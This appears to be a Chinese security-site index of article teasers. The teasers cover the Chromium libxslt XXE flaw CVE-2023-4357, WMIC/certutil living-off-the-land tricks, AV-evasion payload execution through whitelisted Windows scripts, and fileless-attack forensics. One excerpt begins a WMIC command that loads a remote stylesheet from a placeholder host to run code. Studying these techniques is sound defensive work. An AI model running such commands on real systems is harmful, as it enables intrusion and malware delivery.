网安引领时代,弥天点亮未来 0x00写在前面 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责...
还是狠炸裂的!Chromium libxslt XXE漏洞(CVE-2023-435)
修订:编号为CVE-2023-4357。Chromium 是一个开源的网络浏览器项目,由 Google 主导开发。Chromium 常被用作其他浏览器项目的基础,例如Chrome、 Opera、Bra...
CVE-2023-4357,你的浏览器可能有隐患!
前言昨晚看国外大佬的文章,刷到了一个关于 Chrome 的 XXE 漏洞,来了兴趣并看了下,随后简单的在自己手机上复现了一下,竟发现自己的手机内置浏览器存在这个漏洞!然后就有了该文。漏洞在线测试地址请...
【核弹级漏洞预警】苹果、微信、支付宝、小米浏览器、携程应用等均存在任意文件读取漏洞
一、漏洞描述微信、支付宝、小米浏览器、携程应用等国内主流软件均存在任意文件读取漏洞。此漏洞源于谷歌浏览器内核漏洞,而国内很多app,包括苹果内置浏览器均为谷歌浏览器,故影响全系列产品。Google C...
【A9】certutil,wmic命令执行敏感操作
“A9 Team 甲方攻防团队,成员来自某证券、微步、青藤、长亭、安全狗等公司。成员能力涉及安全运营、威胁情报、攻防对抗、渗透测试、数据安全、安全产品开发等领域,持续分享安全运营和攻防的思考和实践。”...
Hacking with Style, Stylesheets
前言前段时间,@subTee放了一个好玩的red team tips,利用wmic来进行bypass。正文命令如下wmic os get /FORMAT:”https://example.com/ev...
远控免杀专题(53)-白名单WMIC.exe执行payload
声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!声明:文中所涉及的技术、思路和工...
远控免杀专题(47)-白名单winrm.vbs、slmgr.vbs执行payload
声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!声明:文中所涉及的技术、思路和工...
【创宇小课堂】渗透测试-XLST
- XSLT简介 -XSL(可扩展样式表语言)是一种用于转换XML文档的语言,XSLT表示的就是XSL转换,转换后得到的一般都是不同的XML文档或其他类型文档,例如HTML文档、CSV文件以及明文文本...
HW知识储备:一次红蓝对抗无文件攻击溯源
文章作者:FFE4原文地址:https://blog.csdn.net/cssxn/article/details/889567320x01 简述前段时间参加公司举办的红蓝对抗演习,帮助蓝军分析并溯源...
【HW前知识库储备】一次红蓝对抗无文件攻击溯源
文章作者:FFE4原文地址:https://blog.csdn.net/cssxn/article/details/889567320x01 简述前段时间参加公司举办的红蓝对抗演习,帮助蓝军分析并溯源...
一次红蓝对抗无文件攻击溯源
文章作者:FFE4原文地址:https://blog.csdn.net/cssxn/article/details/889567320x01 简述前段时间参加公司举办的红蓝对抗演习,帮助蓝军分析并溯源...
3